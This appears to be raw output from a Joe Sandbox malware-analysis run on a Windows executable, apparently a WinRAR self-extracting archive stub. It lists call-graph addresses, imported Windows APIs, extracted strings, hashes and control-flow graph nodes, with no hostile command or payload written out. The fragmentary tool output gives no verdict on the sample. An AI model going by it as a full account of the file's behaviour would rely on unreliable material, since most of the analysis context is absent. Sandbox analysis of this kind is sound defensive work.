28652 7ff70e7bd95b memcpy_s 28647->28652 28654 7ff70e7bd69c 15 API calls memcpy_s 28648->28654 28649 7ff70e7bd97e HeapAlloc 28651 7ff70e7bd995 28649->28651 28649->28652 28652->28648 28652->28649 28653 7ff70e7bbbc0 memcpy_s 2 API calls 28652->28653 28653->28652 28654->28651 28655 7ff70e7b2d6c 28680 7ff70e7b27fc 28655->28680 28658 7ff70e7b2eb8 28779 7ff70e7b3170 7 API calls 2 library calls 28658->28779 28659 7ff70e7b2d88 __scrt_acquire_startup_lock 28661 7ff70e7b2ec2 28659->28661 28664 7ff70e7b2da6 28659->28664 28780 7ff70e7b3170 7 API calls 2 library calls 28661->28780 28663 7ff70e7b2ecd abort 28665 7ff70e7b2dcb 28664->28665 28670 7ff70e7b2de8 __scrt_release_startup_lock 28664->28670 28688 7ff70e7bcd90 28664->28688 28667 7ff70e7b2e51 28692 7ff70e7b32bc 28667->28692 28669 7ff70e7b2e56 28695 7ff70e7bcd20 28669->28695 28670->28667 28776 7ff70e7bc050 35 API calls __GSHandlerCheck_EH 28670->28776 28781 7ff70e7b2fb0 28680->28781 28683 7ff70e7b282b 28783 7ff70e7bcc50 28683->28783 28687 7ff70e7b2827 28687->28658 28687->28659 28689 7ff70e7bcdcc 28688->28689 28690 7ff70e7bcdeb 28688->28690 28689->28690 28800 7ff70e781120 28689->28800 28690->28670 28693 7ff70e7b3cf0 __scrt_get_show_window_mode 28692->28693 28694 7ff70e7b32d3 GetStartupInfoW 28693->28694 28694->28669 28806 7ff70e7c0730 28695->28806 28697 7ff70e7b2e5e 28700 7ff70e7b0754 28697->28700 28698 7ff70e7bcd2f 28698->28697 28810 7ff70e7c0ac0 35 API calls swprintf 28698->28810 28812 7ff70e79dfd0 28700->28812 28703 7ff70e7962dc 35 API calls 28704 7ff70e7b079a 28703->28704 28889 7ff70e7a946c 28704->28889 28706 7ff70e7b07a4 __scrt_get_show_window_mode 28894 7ff70e7a9a14 28706->28894 28708 7ff70e7b096e GetCommandLineW 28712 7ff70e7b0980 28708->28712 28751 7ff70e7b0b42 28708->28751 28709 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28711 7ff70e7b0de2 28709->28711 28710 7ff70e7b0819 28710->28708 28758 7ff70e7b0ddc 28710->28758 28715 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28711->28715 28717 7ff70e78129c 33 API calls 28712->28717 28713 7ff70e796454 34 API calls 28714 7ff70e7b0b51 28713->28714 28719 7ff70e781fa0 31 API calls 28714->28719 28723 7ff70e7b0b68 memcpy_s 28714->28723 28716 7ff70e7b0de8 28715->28716 28721 7ff70e7b1900 _com_raise_error 14 API calls 28716->28721 28718 7ff70e7b09a5 28717->28718 28935 7ff70e7acad0 102 API calls 3 library calls 28718->28935 28719->28723 28720 7ff70e781fa0 31 API calls 28724 7ff70e7b0b93 SetEnvironmentVariableW GetLocalTime 28720->28724 28725 7ff70e7b0e34 28721->28725 28723->28720 28726 7ff70e793e28 swprintf 46 API calls 28724->28726 28727 7ff70e7b0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28726->28727 28904 7ff70e7ab014 LoadBitmapW 28727->28904 28729 7ff70e7b09f9 OpenFileMappingW 28733 7ff70e7b0ad0 CloseHandle 28729->28733 28734 7ff70e7b0a19 MapViewOfFile 28729->28734 28730 7ff70e7b0adb 28738 7ff70e78129c 33 API calls 28730->28738 28732 7ff70e7b09af 28732->28711 28732->28729 28732->28730 28733->28751 28734->28733 28736 7ff70e7b0a3f UnmapViewOfFile MapViewOfFile 28734->28736 28736->28733 28739 7ff70e7b0a71 28736->28739 28737 7ff70e7b0c75 28928 7ff70e7a67b4 28737->28928 28741 7ff70e7b0b00 28738->28741 28936 7ff70e7aa190 33 API calls 2 library calls 28739->28936 28940 7ff70e7afd0c 35 API calls 2 library calls 28741->28940 28745 7ff70e7b0a81 28937 7ff70e7afd0c 35 API calls 2 library calls 28745->28937 28747 7ff70e7a67b4 33 API calls 28750 7ff70e7b0c87 DialogBoxParamW 28747->28750 28748 7ff70e7b0b0a 28748->28751 28753 7ff70e7b0dd7 28748->28753 28749 7ff70e7b0a90 28938 7ff70e79b9b4 102 API calls 28749->28938 28759 7ff70e7b0cd3 28750->28759 28751->28713 28756 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28753->28756 28754 7ff70e7b0aa5 28939 7ff70e79bb00 102 API calls 28754->28939 28756->28758 28757 7ff70e7b0ab8 28762 7ff70e7b0ac7 UnmapViewOfFile 28757->28762 28758->28709 28760 7ff70e7b0ce6 Sleep 28759->28760 28761 7ff70e7b0cec 28759->28761 28760->28761 28763 7ff70e7b0cfa 28761->28763 28941 7ff70e7a9f4c 49 API calls 2 library calls 28761->28941 28762->28733 28765 7ff70e7b0d06 DeleteObject 28763->28765 28766 7ff70e7b0d1f DeleteObject 28765->28766 28767 7ff70e7b0d25 28765->28767 28766->28767 28768 7ff70e7b0d6d 28767->28768 28769 7ff70e7b0d5b 28767->28769 28931 7ff70e7a94e4 28768->28931 28942 7ff70e7afe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28769->28942 28772 7ff70e7b0d60 CloseHandle 28772->28768 28776->28667 28779->28661 28780->28663 28782 7ff70e7b281e __scrt_dllmain_crt_thread_attach 28781->28782 28782->28683 28782->28687 28784 7ff70e7c0d4c 28783->28784 28785 7ff70e7b2830 28784->28785 28788 7ff70e7bec00 28784->28788 28785->28687 28787 7ff70e7b51a0 7 API calls 2 library calls 28785->28787 28787->28687 28799 7ff70e7bf398 EnterCriticalSection 28788->28799 28801 7ff70e7891c8 35 API calls 28800->28801 28802 7ff70e781130 28801->28802 28805 7ff70e7b29bc 34 API calls 28802->28805 28804 7ff70e7b2a01 28804->28689 28805->28804 28807 7ff70e7c073d 28806->28807 28809 7ff70e7c0749 28806->28809 28811 7ff70e7c0570 48 API calls 5 library calls 28807->28811 28809->28698 28810->28698 28811->28809 28943 7ff70e7b2450 28812->28943 28815 7ff70e79e026 GetProcAddress 28818 7ff70e79e053 GetProcAddress 28815->28818 28819 7ff70e79e03b 28815->28819 28816 7ff70e79e07b 28817 7ff70e79e503 28816->28817 28950 7ff70e7bb788 39 API calls _snwprintf 28816->28950 28821 7ff70e796454 34 API calls 28817->28821 28818->28816 28822 7ff70e79e068 28818->28822 28819->28818 28824 7ff70e79e50c 28821->28824 28822->28816 28823 7ff70e79e3b0 28823->28817 28825 7ff70e79e3ba 28823->28825 28826 7ff70e797df4 47 API calls 28824->28826 28827 7ff70e796454 34 API calls 28825->28827 28852 7ff70e79e51a 28826->28852 28828 7ff70e79e3c3 CreateFileW 28827->28828 28830 7ff70e79e4f0 CloseHandle 28828->28830 28831 7ff70e79e403 SetFilePointer 28828->28831 28833 7ff70e781fa0 31 API calls 28830->28833 28831->28830 28832 7ff70e79e41c ReadFile 28831->28832 28832->28830 28834 7ff70e79e444 28832->28834 28833->28817 28835 7ff70e79e800 28834->28835 28836 7ff70e79e458 28834->28836 28956 7ff70e7b2624 8 API calls 28835->28956 28841 7ff70e78129c 33 API calls 28836->28841 28838 7ff70e79e805 28839 7ff70e79e53e CompareStringW 28839->28852 28840 7ff70e78129c 33 API calls 28840->28852 28845 7ff70e79e48f 28841->28845 28842 7ff70e798090 47 API calls 28842->28852 28844 7ff70e781fa0 31 API calls 28844->28852 28848 7ff70e79e4db 28845->28848 28951 7ff70e79d0a0 33 API calls 28845->28951 28846 7ff70e79e7c2 28850 7ff70e781fa0 31 API calls 28846->28850 28847 7ff70e79e648 28952 7ff70e797eb0 47 API calls 28847->28952 28853 7ff70e781fa0 31 API calls 28848->28853 28855 7ff70e79e7cb 28850->28855 28851 7ff70e7932bc 51 API calls 28851->28852 28852->28839 28852->28840 28852->28842 28852->28844 28852->28851 28862 7ff70e79e5cc 28852->28862 28945 7ff70e7951a4 28852->28945 28856 7ff70e79e4e5 28853->28856 28854 7ff70e79e651 28857 7ff70e7951a4 9 API calls 28854->28857 28859 7ff70e781fa0 31 API calls 28855->28859 28860 7ff70e781fa0 31 API calls 28856->28860 28861 7ff70e79e656 28857->28861 28858 7ff70e78129c 33 API calls 28858->28862 28863 7ff70e79e7d5 28859->28863 28860->28830 28864 7ff70e79e706 28861->28864 28871 7ff70e79e661 28861->28871 28862->28858 28865 7ff70e798090 47 API calls 28862->28865 28870 7ff70e781fa0 31 API calls 28862->28870 28873 7ff70e7932bc 51 API calls 28862->28873 28878 7ff70e79e63a 28862->28878 28866 7ff70e7b2320 _handle_error 8 API calls 28863->28866 28867 7ff70e79da98 48 API calls 28864->28867 28865->28862 28868 7ff70e79e7e4 28866->28868 28869 7ff70e79e74b AllocConsole 28867->28869 28868->28703 28872 7ff70e79e755 GetCurrentProcessId AttachConsole 28869->28872 28888 7ff70e79e6fb 28869->28888 28870->28862 28874 7ff70e79aae0 48 API calls 28871->28874 28875 7ff70e79e76c 28872->28875 28873->28862 28877 7ff70e79e6a5 28874->28877 28881 7ff70e79e778 GetStdHandle WriteConsoleW Sleep FreeConsole 28875->28881 28880 7ff70e79da98 48 API calls 28877->28880 28878->28846 28878->28847 28879 7ff70e79e7b9 ExitProcess 28882 7ff70e79e6c3 28880->28882 28881->28888 28883 7ff70e79aae0 48 API calls 28882->28883 28884 7ff70e79e6ce 28883->28884 28953 7ff70e79dc2c 33 API calls 28884->28953 28886 7ff70e79e6da 28954 7ff70e7819e0 31 API calls _invalid_parameter_noinfo_noreturn 28886->28954 28955 7ff70e7819e0 31 API calls _invalid_parameter_noinfo_noreturn 28888->28955 28890 7ff70e79dd88 28889->28890 28891 7ff70e7a9481 OleInitialize 28890->28891 28892 7ff70e7a94a7 28891->28892 28893 7ff70e7a94cd SHGetMalloc 28892->28893 28893->28706 28895 7ff70e7a9a49 28894->28895 28897 7ff70e7a9a4e memcpy_s 28894->28897 28896 7ff70e781fa0 31 API calls 28895->28896 28896->28897 28898 7ff70e781fa0 31 API calls 28897->28898 28900 7ff70e7a9a7d memcpy_s 28897->28900 28898->28900 28899 7ff70e781fa0 31 API calls 28903 7ff70e7a9aac memcpy_s 28899->28903 28900->28899 28900->28903 28901 7ff70e781fa0 31 API calls 28902 7ff70e7a9adb memcpy_s 28901->28902 28902->28710 28902->28902 28903->28901 28903->28902 28905 7ff70e7ab046 28904->28905 28906 7ff70e7ab03e 28904->28906 28907 7ff70e7ab063 28905->28907 28908 7ff70e7ab04e GetObjectW 28905->28908 28957 7ff70e7a8624 FindResourceW 28906->28957 28910 7ff70e7a849c 4 API calls 28907->28910 28908->28907 28912 7ff70e7ab078 28910->28912 28911 7ff70e7ab0ce 28923 7ff70e7998ac 28911->28923 28912->28911 28913 7ff70e7ab09e 28912->28913 28914 7ff70e7a8624 11 API calls 28912->28914 28972 7ff70e7a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28913->28972 28916 7ff70e7ab08a 28914->28916 28916->28913 28918 7ff70e7ab092 DeleteObject 28916->28918 28917 7ff70e7ab0a7 28919 7ff70e7a84cc 4 API calls 28917->28919 28918->28913 28920 7ff70e7ab0b2 28919->28920 28973 7ff70e7a8df4 16 API calls _handle_error 28920->28973 28922 7ff70e7ab0bf DeleteObject 28922->28911 28974 7ff70e7998dc 28923->28974 28925 7ff70e7998ba 29041 7ff70e79a43c GetModuleHandleW FindResourceW 28925->29041 28927 7ff70e7998c2 28927->28737 28929 7ff70e7b21d0 33 API calls 28928->28929 28930 7ff70e7a67fa 28929->28930 28930->28747 28932 7ff70e7a9501 28931->28932 28933 7ff70e7a950a OleUninitialize 28932->28933 28934 7ff70e7ee330 28933->28934 28935->28732 28936->28745 28937->28749 28938->28754 28939->28757 28940->28748 28941->28763 28942->28772 28944 7ff70e79dff4 GetModuleHandleW 28943->28944 28944->28815 28944->28816 28946 7ff70e7951c8 GetVersionExW 28945->28946 28947 7ff70e7951fb 28945->28947 28946->28947 28948 7ff70e7b2320 _handle_error 8 API calls 28947->28948 28949 7ff70e795228 28948->28949 28949->28852 28950->28823 28951->28845 28952->28854 28953->28886 28954->28888 28955->28879 28956->28838 28958 7ff70e7a879b 28957->28958 28959 7ff70e7a864f SizeofResource 28957->28959 28958->28905 28959->28958 28960 7ff70e7a8669 LoadResource 28959->28960 28960->28958 28961 7ff70e7a8682 LockResource 28960->28961 28961->28958 28962 7ff70e7a8697 GlobalAlloc 28961->28962 28962->28958 28963 7ff70e7a86b8 GlobalLock 28962->28963 28964 7ff70e7a8792 GlobalFree 28963->28964 28965 7ff70e7a86ca memcpy_s 28963->28965 28964->28958 28966 7ff70e7a86d8 CreateStreamOnHGlobal 28965->28966 28967 7ff70e7a86f6 GdipAlloc 28966->28967 28968 7ff70e7a8789 GlobalUnlock 28966->28968 28969 7ff70e7a870b 28967->28969 28968->28964 28969->28968 28970 7ff70e7a8772 28969->28970 28971 7ff70e7a875a GdipCreateHBITMAPFromBitmap 28969->28971 28970->28968 28971->28970 28972->28917 28973->28922 28976 7ff70e7998fe _snwprintf 28974->28976 28975 7ff70e799973 29051 7ff70e7968b0 48 API calls 28975->29051 28976->28975 28980 7ff70e799a89 28976->28980 28978 7ff70e79997d memcpy_s 28979 7ff70e781fa0 31 API calls 28978->28979 28982 7ff70e79a42e 28978->28982 28981 7ff70e7999fd 28979->28981 28980->28981 28984 7ff70e7820b0 33 API calls 28980->28984 28986 7ff70e7924c0 54 API calls 28981->28986 28983 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28982->28983 28985 7ff70e79a434 28983->28985 28984->28981 28989 7ff70e7b7904 _invalid_parameter_noinfo_noreturn 31 API calls 28985->28989 28987 7ff70e799a1a 28986->28987 28988 7ff70e799a22 28987->28988 28996 7ff70e799aad 28987->28996 28990 7ff70e79204c 100 API calls 28988->28990 28992 7ff70e79a43a 28989->28992 28993 7ff70e799a2b 28990->28993 28991 7ff70e799b17 29043 7ff70e7ba450 28991->29043 28993->28985 28995 7ff70e799a66 28993->28995 28999 7ff70e7b2320 _handle_error 8 API calls 28995->28999 28996->28991 29000 7ff70e798e58 33 API calls 28996->29000 28998 7ff70e7ba450 31 API calls 29012 7ff70e799b57 __vcrt_FlsAlloc 28998->29012 29001 7ff70e79a40e 28999->29001 29000->28996 29001->28925 29002 7ff70e799c89 29004 7ff70e792aa0 101 API calls 29002->29004 29015 7ff70e799d5c 29002->29015 29003 7ff70e792bb0 101 API calls 29003->29012 29006 7ff70e799ca1 29004->29006 29005 7ff70e7928d0 104 API calls 29005->29012 29007 7ff70e7928d0 104 API calls 29006->29007 29006->29015 29013 7ff70e799cc9 29007->29013 29008 7ff70e79204c 100 API calls 29010 7ff70e79a3f5 29008->29010 29009 7ff70e792aa0 101 API calls 29009->29012 29011 7ff70e781fa0 31 API calls 29010->29011 29011->28995 29012->29002 29012->29003 29012->29005 29012->29009 29012->29015 29013->29015 29035 7ff70e799cd7 __vcrt_FlsAlloc 29013->29035 29052 7ff70e7a0bbc MultiByteToWideChar 29013->29052 29015->29008 29016 7ff70e79a1ec 29029 7ff70e79a2c2 29016->29029 29058 7ff70e7bcf90 31 API calls 2 library calls 29016->29058 29018 7ff70e79a157 29018->29016 29055 7ff70e7bcf90 31 API calls 2 library calls 29018->29055 29020 7ff70e79a14b 29020->28925 29022 7ff70e79a2ae 29022->29029 29060 7ff70e798cd0 33 API calls 2 library calls 29022->29060 29023 7ff70e79a3a2 29025 7ff70e7ba450 31 API calls 29023->29025 29024 7ff70e79a249 29059 7ff70e7bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 29024->29059 29027 7ff70e79a3cb 29025->29027 29031 7ff70e7ba450 31 API calls 29027->29031 29028 7ff70e798e58 33 API calls 29028->29029 29029->29023 29029->29028 29030 7ff70e79a16d 29056 7ff70e7bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 29030->29056 29031->29015 29033 7ff70e79a1d8 29033->29016 29057 7ff70e798cd0 33 API calls 2 library calls 29033->29057 29035->29015 29035->29016 29035->29018 29035->29020 29036 7ff70e79a429 29035->29036 29038 7ff70e7a0f68 WideCharToMultiByte 29035->29038 29053 7ff70e79aa88 45 API calls 2 library calls 29035->29053 29054 7ff70e7ba270 31 API calls 2 library calls 29035->29054 29061 7ff70e7b2624 8 API calls 29036->29061 29038->29035 29042 7ff70e79a468 29041->29042 29042->28927 29044 7ff70e7ba47d 29043->29044 29050 7ff70e7ba492 29044->29050 29062 7ff70e7bd69c 15 API calls memcpy_s 29044->29062 29046 7ff70e7ba487 29063 7ff70e7b78e4 31 API calls _invalid_parameter_noinfo 29046->29063 29047 7ff70e7b2320 _handle_error 8 API calls 29049 7ff70e799b37 29047->29049 29049->28998 29050->29047 29051->28978 29052->29035 29053->29035 29054->29035 29055->29030 29056->29033 29057->29016 29058->29024 29059->29022 29060->29029 29061->28982 29062->29046 29063->29050
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
                                                                                        • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 255727823-2702805183
                                                                                        • Opcode ID: de4f4b709cb2e3ef0afd815f9e2b80d0aadc5616edddabf2b58e030f80ca3454
                                                                                        • Instruction ID: bf21482a8f846e7c341d0cc1ac19734077316db18bfbc7b7277c6f0766181c69
                                                                                        • Opcode Fuzzy Hash: de4f4b709cb2e3ef0afd815f9e2b80d0aadc5616edddabf2b58e030f80ca3454
                                                                                        • Instruction Fuzzy Hash: 69D2C022A0968291EA25FB25EC502FAE361EFDD784FC46136DA4D477A6DF3CE544C320
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$DialogItemPathTemp
                                                                                        • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                        • API String ID: 3007431893-3916287355
                                                                                        • Opcode ID: 43bce5ea5792e882a5fd2fa4796284cee02df7d41660bc68d822efcffb62a44e
                                                                                        • Instruction ID: 62a632c5136d98e0712f2f449bfe5cb42834abcb72f55c1d18b9908274a64c63
                                                                                        • Opcode Fuzzy Hash: 43bce5ea5792e882a5fd2fa4796284cee02df7d41660bc68d822efcffb62a44e
                                                                                        • Instruction Fuzzy Hash: E213A032B04B8285EB10EF64DC402EC67A1EF98798FD42536DA5D17AE9DF38E585C360

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1466 7ff70e7b0754-7ff70e7b0829 call 7ff70e79dfd0 call 7ff70e7962dc call 7ff70e7a946c call 7ff70e7b3cf0 call 7ff70e7a9a14 1477 7ff70e7b0860-7ff70e7b0883 1466->1477 1478 7ff70e7b082b-7ff70e7b0840 1466->1478 1481 7ff70e7b0885-7ff70e7b089a 1477->1481 1482 7ff70e7b08ba-7ff70e7b08dd 1477->1482 1479 7ff70e7b0842-7ff70e7b0855 1478->1479 1480 7ff70e7b085b call 7ff70e7b220c 1478->1480 1479->1480 1487 7ff70e7b0ddd-7ff70e7b0de2 call 7ff70e7b7904 1479->1487 1480->1477 1483 7ff70e7b08b5 call 7ff70e7b220c 1481->1483 1484 7ff70e7b089c-7ff70e7b08af 1481->1484 1485 7ff70e7b08df-7ff70e7b08f4 1482->1485 1486 7ff70e7b0914-7ff70e7b0937 1482->1486 1483->1482 1484->1483 1484->1487 1490 7ff70e7b090f call 7ff70e7b220c 1485->1490 1491 7ff70e7b08f6-7ff70e7b0909 1485->1491 1492 7ff70e7b0939-7ff70e7b094e 1486->1492 1493 7ff70e7b096e-7ff70e7b097a GetCommandLineW 1486->1493 1503 7ff70e7b0de3-7ff70e7b0e2f call 7ff70e7b7904 call 7ff70e7b1900 1487->1503 1490->1486 1491->1487 1491->1490 1496 7ff70e7b0950-7ff70e7b0963 1492->1496 1497 7ff70e7b0969 call 7ff70e7b220c 1492->1497 1499 7ff70e7b0980-7ff70e7b09b7 call 7ff70e7b797c call 7ff70e78129c call 7ff70e7acad0 1493->1499 1500 7ff70e7b0b47-7ff70e7b0b5e call 7ff70e796454 1493->1500 1496->1487 1496->1497 1497->1493 1526 7ff70e7b09b9-7ff70e7b09cc 1499->1526 1527 7ff70e7b09ec-7ff70e7b09f3 1499->1527 1510 7ff70e7b0b60-7ff70e7b0b85 call 7ff70e781fa0 call 7ff70e7b3640 1500->1510 1511 7ff70e7b0b89-7ff70e7b0ce4 call 7ff70e781fa0 SetEnvironmentVariableW GetLocalTime call 7ff70e793e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff70e7ab014 call 7ff70e7998ac call 7ff70e7a67b4 * 2 DialogBoxParamW call 7ff70e7a68a8 * 2 1500->1511 1520 7ff70e7b0e34-7ff70e7b0e6a 1503->1520 1510->1511 1572 7ff70e7b0ce6 Sleep 1511->1572 1573 7ff70e7b0cec-7ff70e7b0cf3 1511->1573 1525 7ff70e7b0e6c 1520->1525 1525->1525 1530 7ff70e7b09e7 call 7ff70e7b220c 1526->1530 1531 7ff70e7b09ce-7ff70e7b09e1 1526->1531 1532 7ff70e7b09f9-7ff70e7b0a13 OpenFileMappingW 1527->1532 1533 7ff70e7b0adb-7ff70e7b0b12 call 7ff70e7b797c call 7ff70e78129c call 7ff70e7afd0c 1527->1533 1530->1527 1531->1503 1531->1530 1537 7ff70e7b0ad0-7ff70e7b0ad9 CloseHandle 1532->1537 1538 7ff70e7b0a19-7ff70e7b0a39 MapViewOfFile 1532->1538 1533->1500 1554 7ff70e7b0b14-7ff70e7b0b27 1533->1554 1537->1500 1538->1537 1541 7ff70e7b0a3f-7ff70e7b0a6f UnmapViewOfFile MapViewOfFile 1538->1541 1541->1537 1544 7ff70e7b0a71-7ff70e7b0aca call 7ff70e7aa190 call 7ff70e7afd0c call 7ff70e79b9b4 call 7ff70e79bb00 call 7ff70e79bb70 UnmapViewOfFile 1541->1544 1544->1537 1557 7ff70e7b0b42 call 7ff70e7b220c 1554->1557 1558 7ff70e7b0b29-7ff70e7b0b3c 1554->1558 1557->1500 1558->1557 1561 7ff70e7b0dd7-7ff70e7b0ddc call 7ff70e7b7904 1558->1561 1561->1487 1572->1573 1575 7ff70e7b0cf5 call 7ff70e7a9f4c 1573->1575 1576 7ff70e7b0cfa-7ff70e7b0d1d call 7ff70e79b8e0 DeleteObject 1573->1576 1575->1576 1580 7ff70e7b0d1f DeleteObject 1576->1580 1581 7ff70e7b0d25-7ff70e7b0d2c 1576->1581 1580->1581 1582 7ff70e7b0d48-7ff70e7b0d59 1581->1582 1583 7ff70e7b0d2e-7ff70e7b0d35 1581->1583 1585 7ff70e7b0d6d-7ff70e7b0d7a 1582->1585 1586 7ff70e7b0d5b-7ff70e7b0d67 call 7ff70e7afe24 CloseHandle 1582->1586 1583->1582 1584 7ff70e7b0d37-7ff70e7b0d43 call 7ff70e78ba0c 1583->1584 1584->1582 1589 7ff70e7b0d9f-7ff70e7b0da4 call 7ff70e7a94e4 1585->1589 1590 7ff70e7b0d7c-7ff70e7b0d89 1585->1590 1586->1585 1597 7ff70e7b0da9-7ff70e7b0dd6 call 7ff70e7b2320 1589->1597 1593 7ff70e7b0d99-7ff70e7b0d9b 1590->1593 1594 7ff70e7b0d8b-7ff70e7b0d93 1590->1594 1593->1589 1596 7ff70e7b0d9d 1593->1596 1594->1589 1595 7ff70e7b0d95-7ff70e7b0d97 1594->1595 1595->1589 1596->1589
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                        • API String ID: 1048086575-3710569615
                                                                                        • Opcode ID: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
                                                                                        • Instruction ID: 80179914f786df03108a1cd75d47497ef385ab8beb42d7633cef01febf55b0ae
                                                                                        • Opcode Fuzzy Hash: f9f8d21d412cc80ec5460a59123b82ae5e39a9285cdf70869c7ac79b4d5a8083
                                                                                        • Instruction Fuzzy Hash: B4126161A18B8285FB10EB24EC453B9F365FF9C794F806235DA9D46AA5DF3CE140C720

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                        • String ID: $%s:$CAPTION
                                                                                        • API String ID: 2100155373-404845831
                                                                                        • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction ID: 4820514864d8568005bcf223a643f460d543b6fdc357f626d762be42c372c350
                                                                                        • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
                                                                                        • Instruction Fuzzy Hash: 7E91B532B1864286E714AF39E80166AB7A1FF8C784F946535EE8D57B58DF3CE805CB10

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
